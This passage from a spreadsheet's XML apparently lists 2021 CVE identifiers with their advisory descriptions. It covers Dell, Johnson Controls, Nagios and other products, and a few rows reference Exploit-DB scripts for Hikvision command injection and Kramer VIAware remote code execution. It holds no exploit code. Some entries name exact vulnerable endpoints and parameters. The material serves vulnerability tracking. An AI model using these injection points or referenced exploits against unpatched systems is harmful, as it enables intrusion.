    <t>Under certain circumstances an unauthenticated user could access the the web API for Metasys ADS/ADX/OAS 10 versions prior to 10.1.6 and 11 versions prior to 11.0.2 and enumerate users.</t>
  </si>
  <si>
    <t>CVE-2021-36201</t>
  </si>
  <si>
    <t>Under certain circumstances a CCURE Portal user could enumerate user accounts in CCURE 9000 version 2.90 and prior versions.</t>
  </si>
  <si>
    <t>CVE-2021-36202</t>
  </si>
  <si>
    <t>Server-Side Request Forgery (SSRF) vulnerability in Johnson Controls Metasys could allow an authenticated attacker to inject malicious code into the MUI PDF export feature. This issue affects: Johnson Controls Metasys All 10 versions versions prior to 10.1.5; All 11 versions versions prior to 11.0.2.</t>
  </si>
  <si>
    <t>CVE-2021-36203</t>
  </si>
  <si>
    <t>The affected product may allow an attacker to identify and forge requests to internal systems by way of a specially crafted request.</t>
  </si>
  <si>
    <t>CVE-2021-36205</t>
  </si>
  <si>
    <t>Under certain circumstances the session token is not cleared on logout.</t>
  </si>
  <si>
    <t>CVE-2021-36206</t>
  </si>
  <si>
    <t>All versions of CEVAS prior to 1.01.46 do not sufficiently validate user-controllable input and could allow a user to bypass authentication and retrieve data with specially crafted SQL queries.</t>
  </si>
  <si>
    <t>CVE-2021-36207</t>
  </si>
  <si>
    <t>Under certain circumstances improper privilege management in Metasys ADS/ADX/OAS servers versions 10 and 11 could allow an authenticated user to elevate their privileges to administrator.</t>
  </si>
  <si>
    <t>CVE-2021-36209</t>
  </si>
  <si>
    <t>In JetBrains Hub before 2021.1.13389, account takeover was possible during password reset.</t>
  </si>
  <si>
    <t>CVE-2021-3621</t>
  </si>
  <si>
    <t>A flaw was found in SSSD, where the sssctl command was vulnerable to shell command injection via the logs-fetch and cache-expire subcommands. This flaw allows an attacker to trick the root user into running a specially crafted sssctl command, such as via sudo, to gain root access. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.</t>
  </si>
  <si>
    <t>CVE-2021-36212</t>
  </si>
  <si>
    <t>app/View/SharingGroups/view.ctp in MISP before 2.4.146 allows stored XSS in the sharing groups view.</t>
  </si>
  <si>
    <t>CVE-2021-36213</t>
  </si>
  <si>
    <t>HashiCorp Consul and Consul Enterprise 1.9.0 through 1.10.0 default deny policy with a single L7 application-aware intention deny action cancels out, causing the intention to incorrectly fail open, allowing L4 traffic. Fixed in 1.9.8 and 1.10.1.</t>
  </si>
  <si>
    <t>CVE-2021-36214</t>
  </si>
  <si>
    <t>LINE client for iOS before 10.16.3 allows cross site script with specific header in WebView.</t>
  </si>
  <si>
    <t>CVE-2021-36215</t>
  </si>
  <si>
    <t>LINE client for iOS 10.21.3 and before allows address bar spoofing due to inappropriate address handling.</t>
  </si>
  <si>
    <t>CVE-2021-36216</t>
  </si>
  <si>
    <t>LINE for Windows 6.2.1.2289 and before allows arbitrary code execution via malicious DLL injection.</t>
  </si>
  <si>
    <t>CVE-2021-36218</t>
  </si>
  <si>
    <t>An issue was discovered in SKALE sgxwallet 1.58.3. sgx_disp_ippsAES_GCMEncrypt allows an out-of-bounds write, resulting in a segfault and compromised enclave. This issue describes a buffer overflow, which was resolved prior to v1.77.0 and not reproducible in latest sgxwallet v1.77.0</t>
  </si>
  <si>
    <t>CVE-2021-36219</t>
  </si>
  <si>
    <t>An issue was discovered in SKALE sgxwallet 1.58.3. The provided input for ECALL 14 triggers a branch in trustedEcdsaSign that frees a non-initialized pointer from the stack. An attacker can chain multiple enclave calls to prepare a stack that contains a valid address. This address is then freed, resulting in compromised integrity of the enclave. This was resolved after v1.58.3 and not reproducible in sgxwallet v1.77.0.</t>
  </si>
  <si>
    <t>CVE-2021-3622</t>
  </si>
  <si>
    <t>A flaw was found in the hivex library. This flaw allows an attacker to input a specially crafted Windows Registry (hive) file, which would cause hivex to recursively call the _get_children() function, leading to a stack overflow. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-36221</t>
  </si>
  <si>
    <t>Go before 1.15.15 and 1.16.x before 1.16.7 has a race condition that can lead to a net/http/httputil ReverseProxy panic upon an ErrAbortHandler abort.</t>
  </si>
  <si>
    <t>CVE-2021-36222</t>
  </si>
  <si>
    <t>ec_verify in kdc/kdc_preauth_ec.c in the Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) before 1.18.4 and 1.19.x before 1.19.2 allows remote attackers to cause a NULL pointer dereference and daemon crash. This occurs because a return value is not properly managed in a certain situation.</t>
  </si>
  <si>
    <t>CVE-2021-3623</t>
  </si>
  <si>
    <t>A flaw was found in libtpms. The flaw can be triggered by specially-crafted TPM 2 command packets containing illegal values and may lead to an out-of-bounds access when the volatile state of the TPM 2 is marshalled/written or unmarshalled/read. The highest threat from this vulnerability is to system availability.</t>
  </si>
  <si>
    <t>CVE-2021-36230</t>
  </si>
  <si>
    <t>HashiCorp Terraform Enterprise releases up to v202106-1 did not properly perform authorization checks on a subset of API requests executed using the run token, allowing privilege escalation to organization owner. Fixed in v202107-1.</t>
  </si>
  <si>
    <t>CVE-2021-36231</t>
  </si>
  <si>
    <t>Deserialization of untrusted data in multiple functions in MIK.starlight 7.9.5.24363 allows authenticated remote attackers to execute operating system commands by crafting serialized objects.</t>
  </si>
  <si>
    <t>CVE-2021-36232</t>
  </si>
  <si>
    <t>Improper Authorization in multiple functions in MIK.starlight 7.9.5.24363 allows an authenticated attacker to escalate privileges.</t>
  </si>
  <si>
    <t>CVE-2021-36233</t>
  </si>
  <si>
    <t>The function AdminGetFirstFileContentByFilePath in MIK.starlight 7.9.5.24363 allows (by design) an authenticated attacker to read arbitrary files from the filesystem by specifying the file path.</t>
  </si>
  <si>
    <t>CVE-2021-36234</t>
  </si>
  <si>
    <t>Use of a hard-coded cryptographic key in MIK.starlight 7.9.5.24363 allows local users to decrypt credentials via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2021-36235</t>
  </si>
  <si>
    <t>An issue was discovered in Ivanti Workspace Control before 10.6.30.0. A locally authenticated user with low privileges can bypass File and Folder Security by leveraging an unspecified attack vector. As a result, the attacker can start applications with elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2021-3624</t>
  </si>
  <si>
    <t>There is an integer overflow vulnerability in dcraw. When the victim runs dcraw with a maliciously crafted X3F input image, arbitrary code may be executed in the victim's system.</t>
  </si>
  <si>
    <t>CVE-2021-3625</t>
  </si>
  <si>
    <t>Buffer overflow in Zephyr USB DFU DNLOAD. Zephyr versions &gt;= v2.5.0 contain Heap-based Buffer Overflow (CWE-122). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-c3gr-hgvr-f363</t>
  </si>
  <si>
    <t>CVE-2021-3626</t>
  </si>
  <si>
    <t>The Windows version of Multipass before 1.7.0 allowed any local process to connect to the localhost TCP control socket to perform mounts from the operating system to a guest, allowing for privilege escalation.</t>
  </si>
  <si>
    <t>exploits/hardware/webapps/50441.py</t>
  </si>
  <si>
    <t>Hikvision Web Server Build 210702 - Command Injection</t>
  </si>
  <si>
    <t>CVE-2021-36260</t>
  </si>
  <si>
    <t>A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.</t>
  </si>
  <si>
    <t>CVE-2021-36276</t>
  </si>
  <si>
    <t>Dell DBUtilDrv2.sys driver (versions 2.5 and 2.6) contains an insufficient access control vulnerability which may lead to escalation of privileges, denial of service, or information disclosure. Local authenticated user access is required.</t>
  </si>
  <si>
    <t>CVE-2021-36277</t>
  </si>
  <si>
    <t>Dell Command | Update, Dell Update, and Alienware Update versions before 4.3 contains an Improper Verification of Cryptographic Signature Vulnerability. A local authenticated malicious user may exploit this vulnerability by executing arbitrary code on the system.</t>
  </si>
  <si>
    <t>CVE-2021-36278</t>
  </si>
  <si>
    <t>Dell EMC PowerScale OneFS versions 8.2.x, 9.1.0.x, and 9.1.1.1 contain a sensitive information exposure vulnerability in log files. A local malicious user with ISI_PRIV_LOGIN_SSH, ISI_PRIV_LOGIN_CONSOLE, or ISI_PRIV_SYS_SUPPORT privileges may exploit this vulnerability to access sensitive information. If any third-party consumes those logs, the same sensitive information is available to those systems as well.</t>
  </si>
  <si>
    <t>CVE-2021-36279</t>
  </si>
  <si>
    <t>Dell EMC PowerScale OneFS versions 8.2.x - 9.2.x contain an incorrect permission assignment for critical resource vulnerability. This could allow a user with ISI_PRIV_LOGIN_SSH or ISI_PRIV_LOGIN_CONSOLE to access privileged information about the cluster.</t>
  </si>
  <si>
    <t>CVE-2021-3628</t>
  </si>
  <si>
    <t>OpenKM Community Edition in its 6.3.10 version is vulnerable to authenticated Cross-site scripting (XSS). A remote attacker could exploit this vulnerability by injecting arbitrary code via de uuid parameter.</t>
  </si>
  <si>
    <t>CVE-2021-36280</t>
  </si>
  <si>
    <t>CVE-2021-36281</t>
  </si>
  <si>
    <t>Dell EMC PowerScale OneFS versions 8.2.x - 9.2.x contain an incorrect permission assignment vulnerability. A low privileged authenticated user can potentially exploit this vulnerability to escalate privileges.</t>
  </si>
  <si>
    <t>CVE-2021-36282</t>
  </si>
  <si>
    <t>Dell EMC PowerScale OneFS versions 8.2.x - 9.1.0.x contain a use of uninitialized resource vulnerability. This can potentially allow an authenticated user with ISI_PRIV_LOGIN_CONSOLE or ISI_PRIV_LOGIN_SSH privileges to gain access up to 24 bytes of data within the /ifs kernel stack under certain conditions.</t>
  </si>
  <si>
    <t>CVE-2021-36283</t>
  </si>
  <si>
    <t>Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution in SMRAM.</t>
  </si>
  <si>
    <t>CVE-2021-36284</t>
  </si>
  <si>
    <t>Dell BIOS contains an Improper Restriction of Excessive Authentication Attempts vulnerability. A local authenticated malicious administrator could exploit this vulnerability to bypass excessive admin password attempt mitigations in order to carry out a brute force attack.</t>
  </si>
  <si>
    <t>CVE-2021-36285</t>
  </si>
  <si>
    <t>Dell BIOS contains an Improper Restriction of Excessive Authentication Attempts vulnerability. A local authenticated malicious administrator could exploit this vulnerability to bypass excessive NVMe password attempt mitigations in order to carry out a brute force attack.</t>
  </si>
  <si>
    <t>CVE-2021-36286</t>
  </si>
  <si>
    <t>Dell SupportAssist Client Consumer versions 3.9.13.0 and any versions prior to 3.9.13.0 contain an arbitrary file deletion vulnerability that can be exploited by using the Windows feature of NTFS called Symbolic links. Symbolic links can be created by any(non-privileged) user under some object directories, but by themselves are not sufficient to successfully escalate privileges. However, combining them with a different object, such as the NTFS junction point allows for the exploitation. Support assist clean files functionality do not distinguish junction points from the physical folder and proceeds to clean the target of the junction that allows nonprivileged users to create junction points and delete arbitrary files on the system which can be accessed only by the admin.</t>
  </si>
  <si>
    <t>CVE-2021-36287</t>
  </si>
  <si>
    <t>Dell VNX2 for file version 8.1.21.266 and earlier, contain an unauthenticated remote code execution vulnerability which may lead unauthenticated users to execute commands on the system.</t>
  </si>
  <si>
    <t>CVE-2021-36288</t>
  </si>
  <si>
    <t>Dell VNX2 for File version 8.1.21.266 and earlier, contain a path traversal vulnerability which may lead unauthenticated users to read/write restricted files</t>
  </si>
  <si>
    <t>CVE-2021-36289</t>
  </si>
  <si>
    <t>Dell VNX2 OE for File versions 8.1.21.266 and earlier, contain a sensitive information disclosure vulnerability. A local malicious user may exploit this vulnerability to read sensitive information and use it.</t>
  </si>
  <si>
    <t>CVE-2021-3629</t>
  </si>
  <si>
    <t>A flaw was found in Undertow. A potential security issue in flow control handling by the browser over http/2 may potentially cause overhead or a denial of service in the server. The highest threat from this vulnerability is availability. This flaw affects Undertow versions prior to 2.0.40.Final and prior to 2.2.11.Final.</t>
  </si>
  <si>
    <t>CVE-2021-36290</t>
  </si>
  <si>
    <t>Dell VNX2 for File version 8.1.21.266 and earlier, contain a privilege escalation vulnerability. A local malicious admin may potentially exploit vulnerability and gain privileges.</t>
  </si>
  <si>
    <t>CVE-2021-36293</t>
  </si>
  <si>
    <t>Dell VNX2 for File version 8.1.21.266 and earlier, contain a privilege escalation vulnerability. A local malicious admin may potentially exploit vulnerability and gain elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2021-36294</t>
  </si>
  <si>
    <t>Dell VNX2 OE for File versions 8.1.21.266 and earlier, contain an authentication bypass vulnerability. A remote unauthenticated attacker may exploit this vulnerability by forging a cookie to login as any user.</t>
  </si>
  <si>
    <t>CVE-2021-36295</t>
  </si>
  <si>
    <t>Dell VNX2 OE for File versions 8.1.21.266 and earlier, contain an authenticated remote code execution vulnerability. A remote malicious user with privileges may exploit this vulnerability to execute commands on the system.</t>
  </si>
  <si>
    <t>CVE-2021-36296</t>
  </si>
  <si>
    <t>CVE-2021-36297</t>
  </si>
  <si>
    <t>SupportAssist Client version 3.8 and 3.9 contains an Untrusted search path vulnerability that allows attackers to load an arbitrary .dll file via .dll planting/hijacking, only by a separate administrative action that is not a default part of the SOSInstallerTool.exe installation for executing arbitrary dll's,</t>
  </si>
  <si>
    <t>CVE-2021-36298</t>
  </si>
  <si>
    <t>Dell EMC InsightIQ, versions prior to 4.1.4, contain risky cryptographic algorithms in the SSH component. A remote unauthenticated attacker could potentially exploit this vulnerability leading to authentication bypass and remote takeover of the InsightIQ. This allows an attacker to take complete control of InsightIQ to affect services provided by SSH; so Dell recommends customers to upgrade at the earliest opportunity.</t>
  </si>
  <si>
    <t>CVE-2021-36299</t>
  </si>
  <si>
    <t>Dell iDRAC9 versions 4.40.00.00 and later, but prior to 4.40.29.00 and 5.00.00.00 contain an SQL injection vulnerability. A remote authenticated malicious user with low privileges may potentially exploit this vulnerability to cause information disclosure or denial of service by supplying specially crafted input data to the affected application.</t>
  </si>
  <si>
    <t>CVE-2021-3630</t>
  </si>
  <si>
    <t>An out-of-bounds write vulnerability was found in DjVuLibre in DJVU::DjVuTXT::decode() in DjVuText.cpp via a crafted djvu file which may lead to crash and segmentation fault. This flaw affects DjVuLibre versions prior to 3.5.28.</t>
  </si>
  <si>
    <t>CVE-2021-36300</t>
  </si>
  <si>
    <t>iDRAC9 versions prior to 5.00.00.00 contain an improper input validation vulnerability. An unauthenticated remote attacker may potentially exploit this vulnerability by sending a specially crafted malicious request to crash the webserver or cause information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-36301</t>
  </si>
  <si>
    <t>Dell iDRAC 9 prior to version 4.40.40.00 and iDRAC 8 prior to version 2.80.80.80 contain a Stack Buffer Overflow in Racadm. An authenticated remote attacker may potentially exploit this vulnerability to control process execution and gain access to the underlying operating system.</t>
  </si>
  <si>
    <t>CVE-2021-36302</t>
  </si>
  <si>
    <t>All Dell EMC Integrated System for Microsoft Azure Stack Hub versions contain a privilege escalation vulnerability. A remote malicious user with standard level JEA credentials may potentially exploit this vulnerability to elevate privileges and take over the system.</t>
  </si>
  <si>
    <t>CVE-2021-36305</t>
  </si>
  <si>
    <t>Dell PowerScale OneFS contains an Unsynchronized Access to Shared Data in a Multithreaded Context in SMB CA handling. An authenticated user of SMB on a cluster with CA could potentially exploit this vulnerability, leading to a denial of service over SMB.</t>
  </si>
  <si>
    <t>CVE-2021-36306</t>
  </si>
  <si>
    <t>Networking OS10, versions prior to October 2021 with RESTCONF API enabled, contains an authentication bypass vulnerability. A remote unauthenticated attacker could exploit this vulnerability to gain access and perform actions on the affected system.</t>
  </si>
  <si>
    <t>CVE-2021-36307</t>
  </si>
  <si>
    <t>Networking OS10, versions prior to October 2021 with RESTCONF API enabled, contains a privilege escalation vulnerability. A malicious low privileged user with specific access to the API could potentially exploit this vulnerability to gain admin privileges on the affected system.</t>
  </si>
  <si>
    <t>CVE-2021-36308</t>
  </si>
  <si>
    <t>Networking OS10, versions prior to October 2021 with Smart Fabric Services enabled, contains an authentication bypass vulnerability. A remote unauthenticated attacker could exploit this vulnerability to gain access and perform actions on the affected system.</t>
  </si>
  <si>
    <t>CVE-2021-36309</t>
  </si>
  <si>
    <t>Dell Enterprise SONiC OS, versions 3.3.0 and earlier, contains a sensitive information disclosure vulnerability. An authenticated malicious user with access to the system may use the TACACS\Radius credentials stored to read sensitive information and use it in further attacks.</t>
  </si>
  <si>
    <t>CVE-2021-3631</t>
  </si>
  <si>
    <t>A flaw was found in libvirt while it generates SELinux MCS category pairs for VMs' dynamic labels. This flaw allows one exploited guest to access files labeled for another guest, resulting in the breaking out of sVirt confinement. The highest threat from this vulnerability is to confidentiality and integrity.</t>
  </si>
  <si>
    <t>CVE-2021-36310</t>
  </si>
  <si>
    <t>Dell Networking OS10, versions 10.4.3.x, 10.5.0.x, 10.5.1.x &amp; 10.5.2.x, contain an uncontrolled resource consumption flaw in its API service. A high-privileged API user may potentially exploit this vulnerability, leading to a denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-36311</t>
  </si>
  <si>
    <t>Dell EMC Networker versions prior to 19.5 contain an Improper Authorization vulnerability. Any local malicious user with networker user privileges may exploit this vulnerability to upload malicious file to unauthorized locations and execute it.</t>
  </si>
  <si>
    <t>CVE-2021-36312</t>
  </si>
  <si>
    <t>Dell EMC CloudLink 7.1 and all prior versions contain a Hard-coded Password Vulnerability. A remote high privileged attacker, with the knowledge of the hard-coded credentials, may potentially exploit this vulnerability to gain unauthorized access to the system.</t>
  </si>
  <si>
    <t>CVE-2021-36313</t>
  </si>
  <si>
    <t>Dell EMC CloudLink 7.1 and all prior versions contain an OS command injection Vulnerability. A remote high privileged attacker, may potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker. This vulnerability is considered critical as it may be leveraged to completely compromise the vulnerable application as well as the underlying operating system. Dell recommends customers to upgrade at the earliest opportunity.</t>
  </si>
  <si>
    <t>CVE-2021-36314</t>
  </si>
  <si>
    <t>Dell EMC CloudLink 7.1 and all prior versions contain an Arbitrary File Creation Vulnerability. A remote unauthenticated attacker, may potentially exploit this vulnerability, leading to the execution of arbitrary files on the end user system.</t>
  </si>
  <si>
    <t>CVE-2021-36315</t>
  </si>
  <si>
    <t>Dell EMC PowerScale Nodes contain a hardware design flaw. This may allow a local unauthenticated user to escalate privileges. This also affects Compliance mode and for Compliance mode clusters, is a critical vulnerability. Dell EMC recommends applying the workaround at your earliest opportunity.</t>
  </si>
  <si>
    <t>CVE-2021-36316</t>
  </si>
  <si>
    <t>Dell EMC Avamar Server versions 18.2, 19.1, 19.2, 19.3, and 19.4 contain an improper privilege management vulnerability in AUI. A malicious user with high privileges could potentially exploit this vulnerability, leading to the disclosure of the AUI info and performing some unauthorized operation on the AUI.</t>
  </si>
  <si>
    <t>CVE-2021-36317</t>
  </si>
  <si>
    <t>Dell EMC Avamar Server version 19.4 contains a plain-text password storage vulnerability in AvInstaller. A local attacker could potentially exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application with privileges of the compromised account.</t>
  </si>
  <si>
    <t>CVE-2021-36318</t>
  </si>
  <si>
    <t>Dell EMC Avamar versions 18.2,19.1,19.2,19.3,19.4 contain a plain-text password storage vulnerability. A high privileged user could potentially exploit this vulnerability, leading to a complete outage.</t>
  </si>
  <si>
    <t>CVE-2021-36319</t>
  </si>
  <si>
    <t>Dell Networking OS10 versions 10.4.3.x, 10.5.0.x and 10.5.1.x contain an information exposure vulnerability. A low privileged authenticated malicious user can gain access to SNMP authentication failure messages.</t>
  </si>
  <si>
    <t>CVE-2021-3632</t>
  </si>
  <si>
    <t>A flaw was found in Keycloak. This vulnerability allows anyone to register a new security device or key when there is not a device already registered for any user by using the WebAuthn password-less login flow.</t>
  </si>
  <si>
    <t>CVE-2021-36320</t>
  </si>
  <si>
    <t>Dell Networking X-Series firmware versions prior to 3.0.1.8 contain an authentication bypass vulnerability. A remote unauthenticated attacker may potentially hijack a session and access the webserver by forging the session ID.</t>
  </si>
  <si>
    <t>CVE-2021-36321</t>
  </si>
  <si>
    <t>Dell Networking X-Series firmware versions prior to 3.0.1.8 contain an improper input validation vulnerability. A remote unauthenticated attacker may potentially exploit this vulnerability by sending specially crafted data to trigger a denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-36322</t>
  </si>
  <si>
    <t>Dell Networking X-Series firmware versions prior to 3.0.1.8 contain a host header injection vulnerability. A remote unauthenticated attacker may potentially exploit this vulnerability by injecting arbitrary host header values to poison the web-cache or trigger redirections.</t>
  </si>
  <si>
    <t>CVE-2021-36323</t>
  </si>
  <si>
    <t>CVE-2021-36324</t>
  </si>
  <si>
    <t>CVE-2021-36325</t>
  </si>
  <si>
    <t>CVE-2021-36326</t>
  </si>
  <si>
    <t>Dell EMC Streaming Data Platform, versions prior to 1.3 contain an SSL Strip Vulnerability in the User Interface (UI). A remote unauthenticated attacker could potentially exploit this vulnerability, leading to a downgrade in the communications between the client and server into an unencrypted format.</t>
  </si>
  <si>
    <t>CVE-2021-36327</t>
  </si>
  <si>
    <t>Dell EMC Streaming Data Platform versions before 1.3 contain a Server Side Request Forgery Vulnerability. A remote unauthenticated attacker may potentially exploit this vulnerability to perform port scanning of internal networks and make HTTP requests to an arbitrary domain of the attacker's choice.</t>
  </si>
  <si>
    <t>CVE-2021-36328</t>
  </si>
  <si>
    <t>Dell EMC Streaming Data Platform versions before 1.3 contain a SQL Injection Vulnerability. A remote malicious user may potentially exploit this vulnerability to execute SQL commands to perform unauthorized actions and retrieve sensitive information from the database.</t>
  </si>
  <si>
    <t>CVE-2021-36329</t>
  </si>
  <si>
    <t>Dell EMC Streaming Data Platform versions before 1.3 contain an Indirect Object Reference Vulnerability. A remote malicious user may potentially exploit this vulnerability to gain sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-3633</t>
  </si>
  <si>
    <t>A DLL preloading vulnerability was reported in Lenovo Driver Management prior to version 2.9.0719.1104 that could allow privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2021-36330</t>
  </si>
  <si>
    <t>Dell EMC Streaming Data Platform versions before 1.3 contain an Insufficient Session Expiration Vulnerability. A remote unauthenticated attacker may potentially exploit this vulnerability to reuse old session artifacts to impersonate a legitimate user.</t>
  </si>
  <si>
    <t>CVE-2021-36332</t>
  </si>
  <si>
    <t>Dell EMC CloudLink 7.1 and all prior versions contain a HTML and Javascript Injection Vulnerability. A remote low privileged attacker, may potentially exploit this vulnerability, directing end user to arbitrary and potentially malicious websites.</t>
  </si>
  <si>
    <t>CVE-2021-36333</t>
  </si>
  <si>
    <t>Dell EMC CloudLink 7.1 and all prior versions contain a Buffer Overflow Vulnerability. A local low privileged attacker, may potentially exploit this vulnerability, leading to an application crash.</t>
  </si>
  <si>
    <t>CVE-2021-36334</t>
  </si>
  <si>
    <t>Dell EMC CloudLink 7.1 and all prior versions contain a CSV formula Injection Vulnerability. A remote high privileged attacker, may potentially exploit this vulnerability, leading to arbitrary code execution on end user machine</t>
  </si>
  <si>
    <t>CVE-2021-36335</t>
  </si>
  <si>
    <t>Dell EMC CloudLink 7.1 and all prior versions contain an Improper Input Validation Vulnerability. A remote low privileged attacker, may potentially exploit this vulnerability, leading to execution of arbitrary files on the server</t>
  </si>
  <si>
    <t>CVE-2021-36336</t>
  </si>
  <si>
    <t>Wyse Management Suite 3.3.1 and below versions contain a deserialization vulnerability that could allow an unauthenticated attacker to execute code on the affected system.</t>
  </si>
  <si>
    <t>CVE-2021-36337</t>
  </si>
  <si>
    <t>Dell Wyse Management Suite version 3.3.1 and prior support insecure Transport Security Protocols TLS 1.0 and TLS 1.1 which are susceptible to Man-In-The-Middle attacks thereby compromising Confidentiality and Integrity of data.</t>
  </si>
  <si>
    <t>CVE-2021-36338</t>
  </si>
  <si>
    <t>Unisphere for PowerMax versions prior to 9.2.2.2 contains a privilege escalation vulnerability. An adjacent malicious user could potentially exploit this vulnerability to escalate their privileges and access functionalities they do not have access to. CVE-2022-31233 addresses the partial fix in CVE-2021-36338.</t>
  </si>
  <si>
    <t>CVE-2021-36339</t>
  </si>
  <si>
    <t>The Dell EMC Virtual Appliances before 9.2.2.2 contain undocumented user accounts. A local malicious user may potentially exploit this vulnerability to get privileged access to the virtual appliance.</t>
  </si>
  <si>
    <t>CVE-2021-3634</t>
  </si>
  <si>
    <t>A flaw has been found in libssh in versions prior to 0.9.6. The SSH protocol keeps track of two shared secrets during the lifetime of the session. One of them is called secret_hash and the other session_id. Initially, both of them are the same, but after key re-exchange, previous session_id is kept and used as an input to new secret_hash. Historically, both of these buffers had shared length variable, which worked as long as these buffers were same. But the key re-exchange operation can also change the key exchange method, which can be based on hash of different size, eventually creating "secret_hash" of different size than the session_id has. This becomes an issue when the session_id memory is zeroed or when it is used again during second key re-exchange.</t>
  </si>
  <si>
    <t>CVE-2021-36340</t>
  </si>
  <si>
    <t>Dell EMC SCG 5.00.00.10 and earlier, contain a sensitive information disclosure vulnerability. A local malicious user may exploit this vulnerability to read sensitive information and use it.</t>
  </si>
  <si>
    <t>CVE-2021-36341</t>
  </si>
  <si>
    <t>Dell Wyse Device Agent version 14.5.4.1 and below contain a sensitive data exposure vulnerability. A local authenticated user with low privileges could potentially exploit this vulnerability in order to access sensitive information.</t>
  </si>
  <si>
    <t>CVE-2021-36342</t>
  </si>
  <si>
    <t>CVE-2021-36343</t>
  </si>
  <si>
    <t>CVE-2021-36346</t>
  </si>
  <si>
    <t>Dell iDRAC 8 prior to version 2.82.82.82 contain a denial of service vulnerability. An unauthenticated remote attacker could potentially exploit this vulnerability to deny access to the iDRAC webserver.</t>
  </si>
  <si>
    <t>CVE-2021-36347</t>
  </si>
  <si>
    <t>iDRAC9 versions prior to 5.00.20.00 and iDRAC8 versions prior to 2.82.82.82 contain a stack-based buffer overflow vulnerability. An authenticated remote attacker with high privileges could potentially exploit this vulnerability to control process execution and gain access to the iDRAC operating system.</t>
  </si>
  <si>
    <t>CVE-2021-36348</t>
  </si>
  <si>
    <t>iDRAC9 versions prior to 5.00.20.00 contain an input injection vulnerability. A remote authenticated malicious user with low privileges may potentially exploit this vulnerability to cause information disclosure or denial of service by supplying specially crafted input data to iDRAC.</t>
  </si>
  <si>
    <t>CVE-2021-36349</t>
  </si>
  <si>
    <t>Dell EMC Data Protection Central versions 19.5 and prior contain a Server Side Request Forgery vulnerability in the DPC DNS client processing. A remote malicious user could potentially exploit this vulnerability, allowing port scanning of external hosts.</t>
  </si>
  <si>
    <t>CVE-2021-3635</t>
  </si>
  <si>
    <t>A flaw was found in the Linux kernel netfilter implementation in versions prior to 5.5-rc7. A user with root (CAP_SYS_ADMIN) access is able to panic the system when issuing netfilter netflow commands.</t>
  </si>
  <si>
    <t>exploits/hardware/remote/50856.py</t>
  </si>
  <si>
    <t>Kramer VIAware - Remote Code Execution (RCE) (Root)</t>
  </si>
  <si>
    <t>2022-04-07</t>
  </si>
  <si>
    <t>CVE-2021-36350</t>
  </si>
  <si>
    <t>Dell PowerScale OneFS, versions 8.2.2-9.3.0.x, contain an authentication bypass by primary weakness in one of the authentication factors. A remote unauthenticated attacker may potentially exploit this vulnerability and bypass one of the factors of authentication.</t>
  </si>
  <si>
    <t>CVE-2021-36351</t>
  </si>
  <si>
    <t>SQL Injection Vulnerability in Care2x Open Source Hospital Information Management 2.7 Alpha via the (1) pday, (2) pmonth, and (3) pyear parameters in GET requests sent to /modules/nursing/nursing-station.php.</t>
  </si>
  <si>
    <t>CVE-2021-36352</t>
  </si>
  <si>
    <t>Stored cross-site scripting (XSS) vulnerability in Care2x Hospital Information Management 2.7 Alpha. The vulnerability has found POST requests in /modules/registration_admission/patient_register.php page with "name_middle", "addr_str", "station", "name_maiden", "name_2", "name_3" parameters.</t>
  </si>
  <si>
    <t>CVE-2021-36356</t>
  </si>
  <si>
    <t>KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames (even though browseSystemFiles.php is no longer reachable via the GUI). NOTE: this issue exists because of an incomplete fix for CVE-2019-17124.</t>
  </si>
  <si>
    <t>CVE-2021-36357</t>
  </si>
  <si>
    <t>An issue was discovered in OpenPOWER 2.6 firmware. unpack_timestamp() calls le32_to_cpu() for endian conversion of a uint16_t "year" value, resulting in a type mismatch that can truncate a higher integer value to a smaller one, and bypass a timestamp check. The fix is to use the right endian conversion function.</t>
  </si>
  <si>
    <t>CVE-2021-36359</t>
  </si>
  <si>
    <t>OrbiTeam BSCW Classic before 7.4.3 allows exportpdf authenticated remote code execution (RCE) via XML tag injection because reportlab\platypus\paraparser.py (reached via bscw.cgi op=_editfolder.EditFolder) calls eval on attacker-supplied Python code. This is fixed in 5.0.12, 5.1.10, 5.2.4, 7.3.3, and 7.4.3.</t>
  </si>
  <si>
    <t>CVE-2021-3636</t>
  </si>
  <si>
    <t>It was found in OpenShift, before version 4.8, that the generated certificate for the in-cluster Service CA, incorrectly included additional certificates. The Service CA is automatically mounted into all pods, allowing them to safely connect to trusted in-cluster services that present certificates signed by the trusted Service CA. The incorrect inclusion of additional CAs in this certificate would allow an attacker that compromises any of the additional CAs to masquerade as a trusted in-cluster service.</t>
  </si>
  <si>
    <t>CVE-2021-36363</t>
  </si>
  <si>
    <t>Nagios XI before 5.8.5 has Incorrect Permission Assignment for migrate.php.</t>
  </si>
  <si>
    <t>CVE-2021-36364</t>
  </si>
  <si>
    <t>Nagios XI before 5.8.5 incorrectly allows backup_xi.sh wildcards.</t>
  </si>
  <si>
    <t>CVE-2021-36365</t>
  </si>
  <si>
    <t>Nagios XI before 5.8.5 has Incorrect Permission Assignment for repairmysql.sh.</t>
  </si>
  <si>
    <t>CVE-2021-36366</t>
  </si>
  <si>
    <t>Nagios XI before 5.8.5 incorrectly allows manage_services.sh wildcards.</t>
  </si>
  <si>
    <t>CVE-2021-36367</t>
  </si>
  <si>
